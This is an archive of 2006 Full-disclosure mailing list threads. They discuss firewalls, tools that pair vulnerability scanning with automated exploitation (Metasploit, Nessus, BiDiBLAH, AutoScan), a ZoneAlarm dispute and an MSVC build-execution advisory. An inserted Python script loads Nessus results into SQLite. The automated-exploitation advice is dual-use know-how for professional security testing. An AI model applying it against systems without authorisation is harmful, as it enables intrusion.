Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] Question for the Windows pros
Applying the Principle of Least Privilege to User Accounts on Windows XP
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/luawinxp.mspx

/JA
Re: [Full-disclosure] PC Firewall Choices
All very good points. I am not certain as to how viable of an option this idea would be, but what about a totally R/O firewall after configuration? Incorporate some sort of memory protection into that, such as stack and heap protection. You'd then have a pretty secure firewall... but then again... if it's passing traffic to an insecure box... you're screwed anyway.

-Adriel

-----Original Message-----
From: Juliao Duartenn [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Wed, 18 Jan 2006 10:28:51 +
Subject: Re: [Full-disclosure] PC Firewall Choices

On Tue, 2006-01-17 at 23:33 -0500, [EMAIL PROTECTED] wrote:
> That's assuming that malware isn't being designed for that firewall. I'm sure you already know that software is software regardless of the hardware that it is running on. Likewise a vulnerability is still a vulnerability... I suppose you could r/o the system... but you need to write the confs somewhere right?
>
> -Adriel

Configuration on a hardware firewall is usually a pretty stable thing - you don't go around opening ports at random every day, now do you?

Most modern {linux|bsd} firewall implementations can now run from a read-only device, namely CD-ROM, and also write their configuration to a removable device that you can manually set RW or RO - floppy, USB pen, etc.

Of course, since most implementations mount parts of the filesystem into RAM, you're still vulnerable to attacks, they are merely non-permanent, if you reboot you are clean again, albeit with the original hole still present, I'd say.

There are, of course, solutions for that too, but I still haven't seen one that really works - meaning that it can detect and prevent tampering in real-time. The best thing I can remember is running tripwire against a RO database on CD, but that can still be tampered with.

Any thoughts?

Juliao

-----Original Message-----
From: [EMAIL PROTECTED]
To: Nick Hyatt [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Tue, 17 Jan 2006 21:08:39 -0500
Subject: Re: [Full-disclosure] PC Firewall Choices

On Tue, 17 Jan 2006 18:59:52 MST, Nick Hyatt said:
> Given the choice between one of those selections and a standard Linksys router / firewall combo, wouldn't it be safer to go with the hardware firewall? I find the configuration options to be quite a bit more in-depth, and the hardware firewall doesn't get itself as stuck in the system as say, ZA does.

Even more important, a hardware firewall can't be compromised as easily by malware that's on a host behind the firewall. It's easy for a program on a PC to tell ZA to look the other way. It's a little harder for it to tell a hardware firewall to look the other way.

Unless of course, the firewall implements the UPnP Pants Down! RPC.. ;)
Re: [Full-disclosure] Startup company
Yes, and shares/ownership.

-Adriel

-----Original Message-----
From: Dude VanWinkle [EMAIL PROTECTED]
To: Shyaam [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Wed, 18 Jan 2006 05:45:53 -0500
Subject: Re: [Full-disclosure] Startup company

On 1/17/06, Shyaam [EMAIL PROTECTED] wrote:
> Hello All,
> My friend is starting a new company for providing Anti-reversing security and related to forensics. Can someone give some tips and guidance.

If you are involved in this foray into Anti-reversing make sure your friend gives you a signed contract :-)

-Dude
Re: [Full-disclosure] Question for the Windows pros
--On Thursday, January 19, 2006 18:54:29 +0100 Jerome Athias [EMAIL PROTECTED] wrote:

> Applying the Principle of Least Privilege to User Accounts on Windows XP
> http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/luawinxp.mspx

I fully understand the principle of least privilege to users. I'm not sure how it applies to my question, though.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Madison,

See, that's the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the highest.

Nevertheless, automation can only be used a limited amount as it reduces quality and accuracy. I know this.

-Adriel

-----Original Message-----
From: Madison, Marc [EMAIL PROTECTED]
To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Wed, 18 Jan 2006 08:02:59 -0600
Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools

I've looked at BidiBLAH (emphasis on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in an easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside of the reporting? Their answer, well let's just say I'm still waiting.

My two cents, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market.

H D Moore wrote:
> Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit:
> - http://www.sensepost.com/research/bidiblah/
>
> The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable.
>
> -HD
>
> On Tuesday 17 January 2006 18:04, H D Moore wrote:
> > You should check out the Metasploit Framework:
> > - http://metasploit.com/projects/Framework/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Again... cheaper than core impact... but not free...

-Adriel

-----Original Message-----
From: Madison, Marc [EMAIL PROTECTED]
To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Wed, 18 Jan 2006 08:13:05 -0600
Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools

H D, my apologies. My FD emails were out of order, and I took your response out of context. If you're looking for a script that will combine MetaSploit, and Nessus then BidiBLAH will work. Still for $10 grand I would suggest taking a scripting class at your local college so you can make your own BidiBlah.

Math:
BidiBLAH: $10,000
College scripting class: $350
The knowledge you'll gain for ever, priceless.

> I've looked at BidiBLAH (emphasis on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in an easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside of the reporting? Their answer, well let's just say I'm still waiting.
>
> My two cents, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market.
>
> H D Moore wrote:
> > Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit:
> > - http://www.sensepost.com/research/bidiblah/
> >
> > The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable.
Re[2]: [Full-disclosure] Vulnerability/Penetration Testing Tools
Dear Marc,

gac> Math:
gac> BidiBLAH: $10,000

The quote you got is obviously lower than the one we received...

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Alright, I've made an observation. Full Disclosure is a list where emails and subjects evolve into new emails and subjects which are not directly related to the first subject or email. For example, this one has evolved into a discussion about overhead, development and other such things. Really, it's quite interesting. ;[

-Adriel

-----Original Message-----
From: [EMAIL PROTECTED]
To: Madison, Marc [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Wed, 18 Jan 2006 12:14:24 -0500
Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

On Wed, 18 Jan 2006 08:13:05 CST, Madison, Marc said:
> H D, my apologies. My FD emails were out of order, and I took your response out of context. If you're looking for a script that will combine MetaSploit, and Nessus then BidiBLAH will work. Still for $10 grand I would suggest taking a scripting class at your local college so you can make your own BidiBlah.
>
> Math:
> BidiBLAH: $10,000
> College scripting class: $350
> The knowledge you'll gain for ever, priceless.

Something to keep in mind however - many people make that comparison, and don't calculate the *TOTAL* cost. If your developer is getting paid $60K/year, the *encumbered* cost (benefits, office, etc) is close to twice that. And if he's writing an in-house BidiBLAh, that's time he's *not* writing stuff you *can't* buy off-the-shelf. As a result, it breaks out as:

BidiBLAH: $10,000
scripting class: $350
6 man-weeks time: $15,000

OK? Got that? Suddenly doesn't look like such a good deal, does it? Maybe you *should* just buy BidiBLAH, and have that guy coding that custom interface between two in-house systems instead

(And don't say I only pay my developer $30K, so he can take 2 man-months to do it - the kind of developer you can keep for $30K is probably going to take a lot more than twice as long as the $60K developer.)
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Dre,

Awesome! Thank you!!

-Adriel

-----Original Message-----
From: Andre Ludwig [EMAIL PROTECTED]
To: [EMAIL PROTECTED] [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Wed, 18 Jan 2006 13:26:54 -0500
Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

http://autoscan.free.fr/index.html

Used to do nessus, nmap, and metasploit via the scripting menu.. Haven't toyed with it in a long while so you may want to check it out and verify it still does all of that.

video of it in action here
http://eks0.free.fr/whax-demos/?f=autoscan-metasploit_config.xml

Dre

On 1/18/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> On Wed, 18 Jan 2006 11:36:04 CST, Madison, Marc said:
> > Developer $60K/year divided by the adopted 2080 man hours year (this is the average hours work, 40 hour week, 5 days, etc...) = $28.85/hourly,
>
> That's the *unencumbered* cost. Now add in the employer cost of health insurance (probably close to $400 or more a month), FICA Medicare, Social Security, workman's comp, pension plan - right there that's another 25% in addition to that $28.85. Now he's costing you $35/hour. And we're not done yet
>
> Then add in the cost of his office - if he has a 10x10 cubicle, and commercial space rents for $10/square foot/mo, that's another $12,000/year. Now add in electricity, the cost of administrative assistants and HR people to support it (unless it's a *small* shop and doesn't have assistants and HR), and so on. Oh, and if you buy him a new $3,000 workstation every third year, that's another $1K/year. This shit adds up. That's why the rule of thumb is the real cost of a technical hire is twice the salary...
>
> > Like you said, many people make that comparison, and don't calculate the *TOTAL* cost.
>
> That's what I said..;)
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
use core-Impact. 'nuff said :-)

----- Original Message -----
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Thursday, January 19, 2006 1:27 PM
Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

Madison,

See, that's the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the highest.

Nevertheless, automation can only be used a limited amount as it reduces quality and accuracy. I know this.

-Adriel

-----Original Message-----
From: Madison, Marc [EMAIL PROTECTED]
To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Wed, 18 Jan 2006 08:02:59 -0600
Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools

I've looked at BidiBLAH (emphasis on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in an easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside of the reporting? Their answer, well let's just say I'm still waiting.

My two cents, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market.

H D Moore wrote:
> Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit:
> - http://www.sensepost.com/research/bidiblah/
>
> The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable.
>
> -HD
>
> On Tuesday 17 January 2006 18:04, H D Moore wrote:
> > You should check out the Metasploit Framework:
> > - http://metasploit.com/projects/Framework/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
> Again... cheaper than core impact... but not free...

Get your employer to reimburse the purchase of a bunch of O'Reilly books from Amazon and learn Perl/Python yourself. It's amazing how fast the brain absorbs information when you're sufficiently motivated.

Nessus is easily scriptable, and with what's on CPAN, it's trivial to get nessus data into MySQL and report against it. Integration with Metasploit is also trivial (as Metasploit modules are all in Perl).

Remember the old adage ... teach a man to fish

~Mike.
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
$$$ ... but it's startin to look that way...

-Adriel

-----Original Message-----
From: Exibar [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Thu, 19 Jan 2006 13:49:49 -0500
Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

use core-Impact. 'nuff said :-)

----- Original Message -----
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Thursday, January 19, 2006 1:27 PM
Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

Madison,

See, that's the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the highest.

Nevertheless, automation can only be used a limited amount as it reduces quality and accuracy. I know this.

-Adriel

-----Original Message-----
From: Madison, Marc [EMAIL PROTECTED]
To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Wed, 18 Jan 2006 08:02:59 -0600
Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools

I've looked at BidiBLAH (emphasis on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in an easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside of the reporting? Their answer, well let's just say I'm still waiting.

My two cents, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market.

H D Moore wrote:
> Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit:
> - http://www.sensepost.com/research/bidiblah/
>
> The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable.
>
> -HD
>
> On Tuesday 17 January 2006 18:04, H D Moore wrote:
> > You should check out the Metasploit Framework:
> > - http://metasploit.com/projects/Framework/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
or learn how to do such tests by hand as that is more accurate than any automated tool out there! a penetration test shouldn't be automated it would miss too many bugs i.e. in custom php/cgi scripts. a professional security audit can only be done by hand. period. too many people rip their customers off with cheap automated tests.

-sk
http://www.groundzero-security.com

----- Original Message -----
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Thursday, January 19, 2006 7:27 PM
Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

Madison,

See, that's the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the highest.

Nevertheless, automation can only be used a limited amount as it reduces quality and accuracy. I know this.

-Adriel

-----Original Message-----
From: Madison, Marc [EMAIL PROTECTED]
To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Wed, 18 Jan 2006 08:02:59 -0600
Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools

I've looked at BidiBLAH (emphasis on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in an easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside of the reporting? Their answer, well let's just say I'm still waiting.

My two cents, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market.

H D Moore wrote:
> Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit:
> - http://www.sensepost.com/research/bidiblah/
>
> The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable.
>
> -HD
>
> On Tuesday 17 January 2006 18:04, H D Moore wrote:
> > You should check out the Metasploit Framework:
> > - http://metasploit.com/projects/Framework/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Sk, I couldn't agree more. Nothing beats real results from real people. Having said that, the time to deliver can be reduced by using automated tools for reconnaissance. If automated scanners identify vulnerabilities in systems then those same services do not need to be fully re-evaluated. That means less work, more savings passed to the client. -Adriel
-Original Message- From: GroundZero Security [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Thu, 19 Jan 2006 20:00:30 +0100 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
or learn how to do such tests by hand as that is more accurate than any automated tool out there! a penetration test shouldn't be automated it would miss too many bugs i.e. in custom php/cgi scripts. a professional security audit can only be done by hand. period. too many people rip their customers off with cheap automated tests. -sk http://www.groundzero-security.com
- Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 7:27 PM Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Madison, See, that's the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the highest. Nevertheless, automation can only be used a limited amount as it reduces quality and accuracy. I know this. -Adriel
-Original Message- From: Madison, Marc [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 08:02:59 -0600 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools
I've looked at BidiBLAH (enfaces on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in an easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside of the reporting? Their answer, well let's just say I'm still waiting. My two cents, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market.
H D Moore wrote: Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit: - http://www.sensepost.com/research/bidiblah/ The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable. -HD
On Tuesday 17 January 2006 18:04, H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Alright, I am well aware of the glory of self education but am still interested in learning what tools exist to date that do this type of automated work. -Adriel
-Original Message- From: Michael Holstein [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thu, 19 Jan 2006 13:57:10 -0500 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Again... cheaper than core impact... but not free... Get your employer to reimburse the purchase of a bunch of O'Reilly books from Amazon and learn Perl/Python yourself. It's amazing how fast the brain absorbs information when you're sufficiently motivated. Nessus is easily scriptable, and with what's on CPAN, it's trivial to get nessus data into MySQL and report against it. Integration with Metasploit is also trivial (as Metasploit modules are all in Perl). Remember the old adage ... teach a man to fish ~Mike.
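The "get nessus data into a database and report against it" step from the quoted reply above, as an added example that is not part of the original thread. Python and SQLite stand in for the Perl/CPAN and MySQL named there; the pipe-delimited NBE field layout is an assumption about Nessus 2.x output, and the hosts and plugin ids are constructed placeholders.

```python
import sqlite3

# Constructed sample. Assumed NBE layout (Nessus 2.x):
#   results|subnet|host|service|plugin_id|severity|description
# Hosts are from the 192.0.2.0/24 documentation range; plugin ids are placeholders.
SAMPLE_NBE = r"""timestamps|||scan_start|Thu Jan 19 13:00:00 2006|
results|192.0.2|192.0.2.10|ssh (22/tcp)
results|192.0.2|192.0.2.10|ssh (22/tcp)|90001|Security Note|Remote SSH version banner disclosed\nConsider hiding it.
results|192.0.2|192.0.2.10|http (80/tcp)|90002|Security Hole|Outdated web server | upgrade required
results|192.0.2|192.0.2.20|smtp (25/tcp)|90003|Security Warning|Mail relay accepts VRFY
results|192.0.2|192.0.2.20|http (80/tcp)|90002|Security Hole|Outdated web server | upgrade required
this line is malformed and must be skipped
timestamps|||scan_end|Thu Jan 19 13:20:00 2006|
"""

# Numeric rank so SQL can sort and count by severity.
SEVERITY_RANK = {"Security Hole": 3, "Security Warning": 2, "Security Note": 1}


def parse_nbe(text):
    """Return one dict per finding; open-port-only and junk lines are skipped."""
    findings = []
    for line in text.splitlines():
        # Split at most 6 times: the description itself may contain '|'.
        parts = line.split("|", 6)
        if parts[0] != "results" or len(parts) < 7:
            continue
        _, _subnet, host, service, plugin_id, severity, desc = parts
        if not plugin_id.isdigit():
            continue
        # "ssh (22/tcp)" -> name "ssh", port 22, proto "tcp"
        name, _, rest = service.partition(" (")
        port, _, proto = rest.rstrip(")").partition("/")
        findings.append({
            "host": host,
            "service": name,
            "port": int(port) if port.isdigit() else None,
            "proto": proto or None,
            "plugin_id": int(plugin_id),
            "severity": severity,
            "sev": SEVERITY_RANK.get(severity, 0),
            # NBE stores newlines as the two characters backslash + n.
            "description": desc.replace("\\n", "\n"),
        })
    return findings


def build_db(text):
    """Load parsed findings into an in-memory database and return the connection."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE findings (host TEXT, service TEXT, port INTEGER, proto TEXT,"
        " plugin_id INTEGER, severity TEXT, sev INTEGER, description TEXT)"
    )
    # Descriptions embed banners sent by the scanned hosts, so they are
    # untrusted input: bind them as parameters, never build SQL from them.
    conn.executemany(
        "INSERT INTO findings VALUES (:host, :service, :port, :proto,"
        " :plugin_id, :severity, :sev, :description)",
        parse_nbe(text),
    )
    conn.commit()
    return conn


def host_summary(conn):
    """Rows of (host, holes, warnings, notes), worst hosts first."""
    return conn.execute(
        "SELECT host, SUM(sev = 3), SUM(sev = 2), SUM(sev = 1) FROM findings"
        " GROUP BY host ORDER BY MAX(sev) DESC, SUM(sev = 3) DESC, host"
    ).fetchall()


def hosts_per_plugin(conn):
    """Rows of (plugin_id, affected_hosts): which finding to fix first."""
    return conn.execute(
        "SELECT plugin_id, COUNT(DISTINCT host) AS n FROM findings"
        " GROUP BY plugin_id ORDER BY n DESC, plugin_id"
    ).fetchall()


if __name__ == "__main__":
    db = build_db(SAMPLE_NBE)
    for row in host_summary(db):
        print("%-12s holes=%d warnings=%d notes=%d" % row)
    for plugin, n in hosts_per_plugin(db):
        print("plugin %d affects %d host(s)" % (plugin, n))
```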
[Full-disclosure] Re: Re: PC Firewall Choices
Stan Bubrouski wrote in news:[EMAIL PROTECTED] On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. Really? Do you just run notepad? I've had to remove it on several machines because it blocked the launch of certain applications despite there being no rules to do so. This includes (to my recollection this was some months ago) some popular tax software updating features, adobe acrobat plugin stopped working within IE even though it was configured to, and numerous other problems that couldn't be tracked to any rules. I run a vast range of apps, including acrobat, and like I said, it's never broken anything for me. Actually, it's just occurred to me that I've only ever used the free version, and the pro version may have features in it that I haven't had a chance to use and are buggy. In which case I'd recommend upgrading to the free version. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when ZA is installed web browsing with IE is slowed down very noticeably, far more than average Norton System Works install causes. But have you diagnosed this problem enough to show that ZA is at fault rather than anything else? Did you do a controlled experiment? Did you take identical machines with identical setups and nothing different between them except ZA on one and Norton on the other and compare them at the same time? 
If you haven't done a controlled experiment, then your assumption that the different behaviours you have observed on two different systems is down to one particular one of the differences between those systems - the PFW software - rather than any of the many many other differences between those systems that you haven't even considered or analyzed - is simply an unproven and unjustified assertion. Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. Neither does anyone else in this thread, you just presume we're all lusers who can't read english or configure simple software. I think you're reading too much into my words. I was expecting an answer along the lines of No, that's perfectly clear, but /this/ one is misleading/confusing/vague. Instead, you've merely repeated your unproven assumption one more time with still no evidence to back it up. So I'm convinced the problem exists between chair and keyboard. Your wild assumptions that because you've never had a problem that anyone who does must be an idiot is astounding...do you teach? No, but I'll try and teach you how not to make assumptions: Saying that the problem exists between chair and keyboard does not make any claim about the nature of that problem. Specifically, it does not imply that the user is an idiot. It implies nothing more than that the user did not operate the software correctly. The rest is something you imagined because you are overreacting emotively. Try using google you'll found thousands of ZA problems, not all imagined Well, I was actually asking _you_ to back up _your_ claims. You are the one making them, after all, so it should be for you to document or otherwise prove them. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? 
Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? Having uninstalled it, deleted the executable, and wiped my free space. No. Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim It's clearly the problem if it degrades system performance, some apps fail to load, and all this goes away when is disabled. And who the hell takes notes on every piece of software they install and remove because its buggy? Please we'd all have a set of encyclopedia-sized notes for Windows problems alone. As I have demonstrated above, not doing a controlled experiment means that your reasoning here is just an exercise in fallacious and dogmatic thinking. As to who takes notes on their processes and procedures, the answer is professionals who understand the value of documentation and repeatability. that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? It's easy to know, because when you uninstall it suddenly things
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools [AutoScan]
Ha! Funny to see a video demo of some code I've written. My alias is 'rastakid' and I wrote the metasploit plugin for AutoScan. It's basically just a perlscript using the GTK2 libraries. AutoScan is a tool which makes it incredibly easy to call external applications with its scanresults as arguments (like IP addresses). Please note: AutoScan is not developed by me, only the Metasploit plugin. I was forced to stop development a couple of months ago because I got really busy with school and left my parent's house so I had no time to work on it anymore. I'm thinking about continuing development if I get more time and there's interest in it. - Vincent 'rastakid' van Scherpenseel
[EMAIL PROTECTED] wrote: Dre, Awesome! Thank you!! -Adriel
-Original Message- From: Andre Ludwig [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 13:26:54 -0500 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
http://autoscan.free.fr/index.html Used to do nessus, nmap, and metasploit via the scripting menu.. Haven't toyed with it in a long while so you may want to check it out and verify it still does all of that. video of it in action here http://eks0.free.fr/whax-demos/?f=autoscan-metasploit_config.xml Dre
On 1/18/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Wed, 18 Jan 2006 11:36:04 CST, Madison, Marc said: Developer $60K/year divided by the adopted 2080 man hours year (this is the average hours work, 40 hour week, 5 days, etc...) = $28.85/hourly, That's the *unencumbered* cost. Now add in the employer cost of health insurance (probably close to $400 or more a month), FICA Medicare, Social Security, workman's comp, pension plan - right there that's another 25% in addition to that $28.85. Now he's costing you $35/hour. And we're not done yet. Then add in the cost of his office - if he has a 10x10 cubicle, and commercial space rents for $10/square foot/mo, that's another $12,000/year. Now add in electricity, the cost of administrative assistants and HR people to support it (unless it's a *small* shop and doesn't have assistants and HR), and so on. Oh, and if you buy him a new $3,000 workstation every third year, that's another $1K/year. This shit adds up. That's why the rule of thumb is the real cost of a technical hire is twice the salary... Like you said, many people make that comparison, and don't calculate the *TOTAL* cost. That's what I said..;)
Re: [Full-disclosure] Security Bug in MSVC
i think the author of this advisory is desperate for advisories or attention. either way he needs to open a disassembler and work on something else.
Pavel Kankovsky wrote: On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example )
What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure there is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation.
Re: [Full-disclosure] Security Bug in MSVC
On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example )
It's interesting, eh, that the current generation of developers that MS has been ushering in since VB inception has necessitated such an advisory. --OE
[Full-disclosure] MDKSA-2006:017 - Updated mod_auth_ldap packages fix vulnerability
Mandriva Linux Security Advisory MDKSA-2006:017
http://www.mandriva.com/security/
Package : mod_auth_ldap
Date: January 19, 2006
Affected: Corporate 2.1
